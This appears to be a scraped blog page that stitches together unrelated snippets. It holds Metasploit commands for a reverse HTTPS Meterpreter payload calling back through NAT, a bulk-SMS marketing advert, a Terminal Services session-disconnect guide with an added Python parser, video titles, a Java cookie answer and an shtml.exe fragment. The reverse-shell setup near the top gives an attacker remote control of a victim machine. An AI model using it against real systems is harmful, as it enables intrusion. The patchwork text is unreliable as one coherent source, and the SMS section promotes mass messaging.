Thursday, May 25, 2017

Metasploit Get Shell Through NAT

You can use windows/meterpreter/reverse_https and set LHOST to your public IP. Make sure you forward port 443 on your router/firewall to the machine hosting Metasploit.
set payload windows/meterpreter/reverse_https
set LPORT 443
set LHOST YOUR PUBLIC IP
"Since our attacker host is behind NAT, we have to use the public IP address of the router/firewall as LHOST. When the exploit is executed, this IP will be embedded in the shellcode and when the initial Meterpreter shellcode runs on the target, it will connect back to this IP address. The port forwarding on our router/firewall will then forward traffic to our LAN IP of the attacker host. For this reason, we need to set LHOST to 1.1.1.1 (the public IP of your attacker router/firewall)
Using a public IP as LHOST also means that Metasploit will attempt to bind itself to that IP when setting up the Meterpreter handler. Since this IP belongs to the router/firewall and not to the Metasploit instance, this will obviously fail. The good thing is that Metasploit will automatically fall back to 0.0.0.0 and basically serve the Meterpreter handler on all local IPs on the attacker host, while remembering that LHOST was set to our public IP address. This is exactly what we need."

MASSIVE SMS MARKETING

Smser

Description

A simple PHP script, easy to modify, for sending SMS text messages through an API. SMS gateway (Australia, United Kingdom, United States, Brazil, Türkiye, España, Suomi, México, Italia, India, France, Malaysia, Argentina, Colombia, Canada, Indonesia, Deutschland, Nigeria, Kenya, Ethiopia, Egypt, Philippines and worldwide coverage) over HTTP with your virtual mobile number and delivery reports. You just have to enter your account information ( https://www.proovl.com ) and upload the file to your server.

https://www.youtube.com/watch?v=dfPh7Qs_twk 
https://www.youtube.com/channel/UCYuMRNb_SRZ4FMsZjnHRZUA 


https://www.proovl.com/websms 

Numbers for SMS => https://www.proovl.com 
One-day SMS numbers => https://www.groovl.com 

receive sms online script
https://sourceforge.net/projects/sms-number/
Bulk SMS script
https://sourceforge.net/projects/bulk-sms-script/
http://aaronsmith-tech.blogspot.com/2017/04/send-text-messages-from-website-using.html 

Howto: Remotely disconnect a Terminal Services Session

I’ve written about another method for remotely disconnecting a terminal server session; it can be found here.
Windows Server 2000/2003 allows two remote Terminal Services connections for administrative purposes. Every once in a while I’ll get the “You exceeded the allowed connection count” message when trying to connect to a server via RDP, because previous sessions were not disconnected correctly.
You can use either of the following methods to remotely disconnect Terminal Server sessions.
Method 1
You can normally run the Terminal Services Manager program on another server, or even from a Windows XP workstation, to disconnect Terminal Services connections by clicking Start – Run and then typing
%SystemRoot%\system32\tsadmin.exe
This will launch the local copy of Terminal Services Manager.  Next right click on All Listed Servers and select Connect to Computer.  Type in the name or IP address of the server you wish to manage. 
[Screenshot: All Listed Servers in Terminal Services Manager]
Select your server from the left pane, then select the Sessions tab from the right pane.  Right click on the session you wish to disconnect and select Disconnect.
You should now be able to login to the target server via Terminal Services.
Method 2
Authenticate to the server you wish to manage.  You can easily accomplish this by mapping a network drive to a share on the target server.  Start a command prompt and type
qwinsta /server:yourservername
where yourservername is the name or IP address of the server you wish to manage.
In my case I ran qwinsta /server:10.0.0.2
You can see the Administrator account is logged into session 0 and the admin account is logged into session 1.  To disconnect the admin session with ID=1 I’ll run the following from a command prompt:
rwinsta ID /server:yourservername
where ID is the session ID of the session you wish to terminate, and yourservername is the name or IP address of the server you wish to manage.
In my case I ran rwinsta 1 /server:10.0.0.2
I again ran qwinsta /server:10.0.0.2 which verified session 1 had been disconnected.  I confirmed that I was once again able to login to Terminal Services.
Thanks to Ingo for some of the information, which I found via Andy
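Method 2 above reads the session ID off the qwinsta table by eye. As an added example (not from the post), here is a Python parser for that fixed-width output that handles the two rows whitespace-splitting gets wrong, the listener with no user and a disconnected session with no session name, and builds the rwinsta command for the user you want to reset. The sample output and the jdoe session are constructed; the server address 10.0.0.2 and the two admin sessions are the ones from the post.

```python
import re

# Constructed sample of "qwinsta /server:10.0.0.2" output: the post's two
# sessions plus a listener (no user) and a disconnected session (no name).
QWINSTA_SAMPLE = """\
 SESSIONNAME       USERNAME                 ID  STATE   TYPE        DEVICE
 console           Administrator             0  Active  wdcon
 rdp-tcp#2         admin                     1  Active  rdpwd
 rdp-tcp                                 65536  Listen  rdpwd
                   jdoe                      2  Disc    rdpwd
"""

# After the session-name column: optional user, numeric ID, state, then
# optional type and device.
_ROW_RE = re.compile(
    r"^\s*(?:(?P<user>\S+)\s+)?(?P<id>\d+)\s+(?P<state>\S+)"
    r"(?:\s+(?P<type>\S+))?(?:\s+(?P<device>\S+))?\s*$"
)

def parse_qwinsta(output):
    """Parse qwinsta's fixed-width table. Session name is blank for
    disconnected sessions and user is blank for listeners, so split by
    column: a token starting before the USERNAME header is the name."""
    lines = [line for line in output.splitlines() if line.strip()]
    user_col = lines[0].index("USERNAME")
    sessions = []
    for row in lines[1:]:
        first = re.search(r"\S+", row)
        if first and first.start() < user_col:
            name, rest = first.group().lstrip(">"), row[first.end():]
        else:
            name, rest = "", row
        match = _ROW_RE.match(rest)
        if match:
            sessions.append({"session": name, "user": match["user"] or "",
                             "id": int(match["id"]), "state": match["state"]})
    return sessions

def find_session_id(output, username):
    """Return the numeric session ID for username, or None if not logged on."""
    for s in parse_qwinsta(output):
        if s["user"].lower() == username.lower():
            return s["id"]
    return None

def rwinsta_command(session_id, server):
    """Build the rwinsta argv from Method 2 that resets the given session."""
    return ["rwinsta", str(session_id), f"/server:{server}"]
```

Feed it the real output (for example from subprocess.run(["qwinsta", "/server:10.0.0.2"], capture_output=True, text=True).stdout) and pass the returned ID to rwinsta_command.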

Wednesday, May 24, 2017

Jackass bad grandpa funeral scene!

Red 2 You Dead Yet Moses !!!

look at the trap: But you can set a cookie in a servlet/script and then read/modify the cookie in another servlet/script on the same host. You can even read or modify a cookie set on a server running on one port on the same hostname/domain from a server running on another port at the same hostname/domain - so you can have Tomcat running on two different ports on the same server and exchange cookies between the two.

Note that you're calling setDomain incorrectly in the first example - this field of the cookie takes a domain name and not a full URL. So the call should look like this:
cookie.setDomain("localhost");
As the other answer notes, some browsers ignore cookies for localhost, so you may want to not set this field of the cookie at all - this has the effect of setting a cookie that will only be returned to the same host that set it (which most of the time is what you want).



Passing a path to a non-existent file to the shtml.exe or shtml.dll (link: https://github.com/andresriancho/w3af-kali/blob/master/w3af/plugins/tests/crawl/pykto/scan_database.db)


